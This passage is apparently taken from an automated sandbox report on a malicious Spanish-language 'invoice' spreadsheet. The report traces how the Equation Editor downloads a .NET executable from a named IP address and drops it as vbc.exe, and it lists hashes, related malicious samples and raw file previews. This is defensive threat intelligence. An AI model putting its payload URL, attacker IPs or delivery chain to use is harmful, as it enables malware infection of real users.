                    http://www.day.com/dam/1.069CBECC2.emf.0.drfalse
                      high
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%havbc.exe, 00000007.00000002.2364285317.0000000002511000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipvbc.exe, 00000007.00000002.2363650906.0000000000402000.00000040.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://api.twitter.com/1/direct_messages.xml?since_id=vbc.exe, vbc.exe, 00000007.00000002.2364130340.0000000000EC2000.00000020.00020000.sdmp, oso[1].exe.4.drfalse
                        high

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        198.12.91.148
                        unknownUnited States
                        36352AS-COLOCROSSINGUStrue

                        General Information

                        Joe Sandbox Version:33.0.0 White Diamond
                        Analysis ID:452698
                        Start date:22.07.2021
                        Start time:18:17:10
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:FACTURA 3879843.xlsx
                        Cookbook file name:defaultwindowsofficecookbook.jbs
                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                        Number of analysed new started processes analysed:6
                        Number of new started drivers analysed:2
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.troj.expl.evad.winXLSX@6/13@0/1
                        EGA Information:Failed
                        HDC Information:Failed
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .xlsx
                        • Found Word or Excel or PowerPoint or XPS Viewer
                        • Attach to Office via COM
                        • Scroll down
                        • Close Viewer
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
                        • TCP Packets have been reduced to 100
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        18:18:07API Interceptor88x Sleep call for process: EQNEDT32.EXE modified
                        18:18:11API Interceptor884x Sleep call for process: vbc.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        198.12.91.148FACTURAS PENDIENTES 3782#.xlsxGet hashmaliciousBrowse
                        • 198.12.91.148/can.exe
                        DHL 932864790.xlsxGet hashmaliciousBrowse
                        • 198.12.91.148/man.exe

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        AS-COLOCROSSINGUS6HAisf3waNGet hashmaliciousBrowse
                        • 23.236.181.202
                        Swift-Payment_Details.xlsxGet hashmaliciousBrowse
                        • 192.210.173.40
                        PO20210722.xlsxGet hashmaliciousBrowse
                        • 172.245.119.43
                        USD_SLIP.docxGet hashmaliciousBrowse
                        • 198.46.132.159
                        o3ZUDIEL1vGet hashmaliciousBrowse
                        • 107.173.85.99
                        Invoice.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        BANKINV19072021LIMCA.xlsxGet hashmaliciousBrowse
                        • 192.227.129.35
                        aJw19xLGjcGet hashmaliciousBrowse
                        • 107.172.196.205
                        uqZ7bBFvVLGet hashmaliciousBrowse
                        • 107.172.196.205
                        9J7OaHH7ObGet hashmaliciousBrowse
                        • 107.172.196.205
                        QbdydvqPuuGet hashmaliciousBrowse
                        • 107.172.196.205
                        sphost.exeGet hashmaliciousBrowse
                        • 172.245.186.101
                        _VM_1064855583.HtMGet hashmaliciousBrowse
                        • 75.127.11.55
                        Inv-04_PDF.vbsGet hashmaliciousBrowse
                        • 192.227.128.168
                        Dvf7OP92yJGet hashmaliciousBrowse
                        • 104.170.143.71
                        PURCHASE ORDER 72021.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        Order Request for Quotation.xlsxGet hashmaliciousBrowse
                        • 198.12.91.134
                        Quotaton.xlsxGet hashmaliciousBrowse
                        • 198.12.81.125
                        SWIFT MESSAGE DETAILS.xlsxGet hashmaliciousBrowse
                        • 192.210.173.40
                        PI.xlsxGet hashmaliciousBrowse
                        • 198.23.207.48

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\oso[1].exe
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:downloaded
                        Size (bytes):1021952
                        Entropy (8bit):7.259067983893984
                        Encrypted:false
                        SSDEEP:12288:gBKH67/6J5DhLI7/Hc6m60hVaIQNSef8IkyrA8Iz/syaUVKnpL7INeLc:gBJ63VUiXhIPSClkSAjzahpgNeLc
                        MD5:E8194372570D57749B3033E063BDC5D8
                        SHA1:50C6AB11638DBF4428767359BFA824A12022D7DC
                        SHA-256:5E6C4E2ABF28FE57B881DC7751FE2422D5515232C93F3049276607CBC01AC74F
                        SHA-512:73B360EC191DBC7A048021696ABEFC74EDDBFD8DB0B622EA5CB8A1D275792C42DDED1E7577352F5C02FCEB343D1550FF389626DA63467A8B579B77816CF48981
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Reputation:low
                        IE Cache URL:http://198.12.91.148/oso.exe
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..`.................2...b.......Q... ...`....@.. ....................................@..................................P..K........]........................................................................... ............... ..H............text...41... ...2.................. ..`.sdata.......`.......6..............@....rsrc....].......^...8..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2A2F8885.emf
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):7608
                        Entropy (8bit):5.086576227479567
                        Encrypted:false
                        SSDEEP:96:+SwrLSR5gs3iwiMO10VCVU7ckQadVDYM/PVfmhDqpH:5wA+sW31RGtdVDYM3VfmkpH
                        MD5:1ED4B40E04D22D709A03B25997BD507E
                        SHA1:01176038331214422A0009B8C00BCCC39EB3DACC
                        SHA-256:8DAFCB076D4B82B4F83ADCB56C61EDC5FEF22ACDCEA454B9EFABF31D51D0045E
                        SHA-512:975E373704460F0D6109237D1D46AA5266FED6F3435602D9938045C9C8A6C7766D7AB8682F9D99E7C2833181EFF11A1B421F3DC890ED6901EB700674ED3E0BC9
                        Malicious:false
                        Reputation:low
                        Preview: ....l...,...........<................... EMF................................8...X....................?..................................C...R...p...................................S.e.g.o.e. .U.I................................................... .6.).X.......d.....................^...^....p....\.....^.......^.<.^....p......^..6Pv...p....`..pp. .$y.v.S............^....v....$.....J.d.......t.^..^.p.....^.pPD...S...l......-...$.^..<.v................<.>v.Z.v....X.2p....p. ........................vdv......%...................................r...................'...........(...(..................?...........?................l...4...........(...(...(...(...(..... .............................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\53902E5A.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):94963
                        Entropy (8bit):7.9700481154985985
                        Encrypted:false
                        SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                        MD5:17EC925977BED2836071429D7B476809
                        SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                        SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                        SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\593E6A20.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                        Category:dropped
                        Size (bytes):62140
                        Entropy (8bit):7.529847875703774
                        Encrypted:false
                        SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                        MD5:722C1BE1697CFCEAE7BDEFB463265578
                        SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                        SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                        SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\69CBECC2.emf
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                        Category:dropped
                        Size (bytes):648132
                        Entropy (8bit):2.812391839617042
                        Encrypted:false
                        SSDEEP:3072:d34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:94UcLe0JOcXuunhqcS
                        MD5:B04EDAAE667522159F7332DBF52C609F
                        SHA1:D73B3F6111E6B33EBF03368CB203FBAB0A37706E
                        SHA-256:54D0E8AF520AF56D739B814816190A27847150A8D3EA870A4A9145A4B8F7B699
                        SHA-512:B404B405FF03619D73AD0281F8B7A4E07C101E261C52EB09E4795F7DE08AB0B465FF51E2B57804094C2C671FA5EE0380100E11E189CF3670B4F413EFCCEE1BF4
                        Malicious:false
                        Reputation:low
                        Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................z$...l..-z.z.@..%...H............p...NqP..........X......NqP...... ....y.z...... .........(..z.z............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i...........|..X...............(....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... ...6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F70F52E.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 816 x 552, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):94963
                        Entropy (8bit):7.9700481154985985
                        Encrypted:false
                        SSDEEP:1536:U75cCbvD0PYFuxgYx30CS9ITdjq/DnjKqLqA/cx8zJjCKouoRwWH/EXXXXXXXXXB:kAPVZZ+oq/3TLPcx8zJjCXaWfEXXXXXB
                        MD5:17EC925977BED2836071429D7B476809
                        SHA1:7A176027FFD13AA407EF29EA42C8DDF7F0CC5D5C
                        SHA-256:83905385F5DF8E961CE87C8C4F5E2F470CBA3198A6C1ABB0258218D932DDF2E9
                        SHA-512:3E63730BC8FFEAD4A57854FEA1F1F137F52683734B68003480030DA77379EF6347115840280B63B75D61569B2F4F307B832241E3CEC23AD27A771F7B16D199A2
                        Malicious:false
                        Preview: .PNG........IHDR...0...(.....9.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....e.z...b.$..P ..^.Jd..8.........c..c..mF.&......F...[....Zk...>.g....{...U.T.S.'.O......eS`S`S`S`S`S`S`S..Q.{....._...?...g7.6.6.6.6.6.6.6......$......................!..c.?.).).).).).)..).=...+.....................}................x.....O.M.M.M.M.M.M.M..M...>....o.l.l.l.l.l..z.l@...&.................@.....C................+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1........................]............x....e..n............+...d.x.w.7.6.6.6.6.6.^..6 {..[.).).).).).)..)...+....M.M.M.M.M.M..A...^.8.Vl.l.l.l.l.l..b.l@....w}S`S`S`S`S`S.eP`...1..................?.....b..o.l.l.l.l.l.l.|`.l@...`.~S`S`S`S`S`S`S`..=.6.6.6.6.6.6.6.>0.6 ....?.).).).).).).).......................}..................l.M.M.M.M.M.M.M..L...>....o.l.l.l.l.l.l.l@.....................d.x...7.6.6.6.6.6.6.6 .s`S`S`S`S`S`S`S..S`...<...
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BEAC757.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                        Category:dropped
                        Size (bytes):85020
                        Entropy (8bit):7.2472785111025875
                        Encrypted:false
                        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                        MD5:738BDB90A9D8929A5FB2D06775F3336F
                        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                        Malicious:false
                        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B9C2427D.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEA251DB.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
                        Category:dropped
                        Size (bytes):85020
                        Entropy (8bit):7.2472785111025875
                        Encrypted:false
                        SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
                        MD5:738BDB90A9D8929A5FB2D06775F3336F
                        SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
                        SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
                        SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
                        Malicious:false
                        Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C39423A1.png
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                        Category:dropped
                        Size (bytes):11303
                        Entropy (8bit):7.909402464702408
                        Encrypted:false
                        SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                        MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                        SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                        SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                        SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                        Malicious:false
                        Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\EDD7C96C.jpeg
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 654x513, frames 3
                        Category:dropped
                        Size (bytes):62140
                        Entropy (8bit):7.529847875703774
                        Encrypted:false
                        SSDEEP:1536:S30U+TLdCuTO/G6VepVUxKHu9CongJvJsg:vCTbVKVzHu9ConWvJF
                        MD5:722C1BE1697CFCEAE7BDEFB463265578
                        SHA1:7D300A2BAB951B475477FAA308E4160C67AD93A9
                        SHA-256:2EE4908690748F50B261A796E6932FBCA10A79D83C316A9CEE92726CA4453DAE
                        SHA-512:2F38E0581397025674FA40B20E73B32D26F43851BE9A8DFA0B1655795CDC476A5171249D1D8D383693775ED9F132FA6BB56D92A8949191738AF05DA053C4E561
                        Malicious:false
                        Preview: ......JFIF.....`.`......Exif..MM.*.......;.........J.i.........R.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                        C:\Users\user\Desktop\~$FACTURA 3879843.xlsx
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):330
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                        MD5:96114D75E30EBD26B572C1FC83D1D02E
                        SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
                        SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                        SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                        Malicious:true
                        Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        C:\Users\Public\vbc.exe
                        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Category:dropped
                        Size (bytes):1021952
                        Entropy (8bit):7.259067983893984
                        Encrypted:false
                        SSDEEP:12288:gBKH67/6J5DhLI7/Hc6m60hVaIQNSef8IkyrA8Iz/syaUVKnpL7INeLc:gBJ63VUiXhIPSClkSAjzahpgNeLc
                        MD5:E8194372570D57749B3033E063BDC5D8
                        SHA1:50C6AB11638DBF4428767359BFA824A12022D7DC
                        SHA-256:5E6C4E2ABF28FE57B881DC7751FE2422D5515232C93F3049276607CBC01AC74F
                        SHA-512:73B360EC191DBC7A048021696ABEFC74EDDBFD8DB0B622EA5CB8A1D275792C42DDED1E7577352F5C02FCEB343D1550FF389626DA63467A8B579B77816CF48981
                        Malicious:true
                        Antivirus:
                        • Antivirus: Joe Sandbox ML, Detection: 100%
                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...+..`.................2...b.......Q... ...`....@.. ....................................@..................................P..K........]........................................................................... ............... ..H............text...41... ...2.................. ..`.sdata.......`.......6..............@....rsrc....].......^...8..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                        Static File Info

                        General

                        File type:CDFV2 Encrypted
                        Entropy (8bit):7.994232412140433
                        TrID:
                        • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                        File name:FACTURA 3879843.xlsx
                        File size:1227776
                        MD5:9ae3b1aa2c80f4e12e33569d7b5839df
                        SHA1:8579f018a10f93cedbb73369fb8c7b66416d9846
                        SHA256:82737660638921bf4d3e82bf4c059ec3cb0b61bd988365572bd4207b87ceb060
                        SHA512:365e321efdcc8d3bfaa5d239ab31b88a21fb446382ac263d06aeeafc616999ebd37fcdc97a8c48d1f9e8b9338d719abdcfe7e96b6320cc4b9b361af84ce34928
                        SSDEEP:24576:oi5w8rke62kK0gdD6kAM41j3qU87qnaF9YEof0lm1BTY29zn1nclKd:oCwi62kK0gZ6D1jDA9YIl+NT1Dd
                        File Content Preview:........................>.......................................................................................................|.......~......................................................................................................................

                        File Icon

                        Icon Hash:e4e2aa8aa4b4bcb4

                        Static OLE Info

                        General

                        Document Type:OLE
                        Number of OLE Files:1

                        OLE File "FACTURA 3879843.xlsx"

                        Indicators

                        Has Summary Info:False
                        Application Name:unknown
                        Encrypted Document:True
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:False
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:
                        Flash Objects Count:
                        Contains VBA Macros:False

                        Streams

                        Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace, File Type: data, Stream Size: 64
                        General
                        Stream Path:\x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                        File Type:data
                        Stream Size:64
                        Entropy:2.73637206947
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                        Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                        Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                        General
                        Stream Path:\x6DataSpaces/DataSpaceMap
                        File Type:data
                        Stream Size:112
                        Entropy:2.7597816111
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                        Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                        Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                        General
